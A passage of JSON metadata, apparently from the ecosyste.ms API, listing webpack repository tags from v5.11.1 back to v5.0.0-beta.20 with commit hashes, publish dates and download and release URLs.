job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","k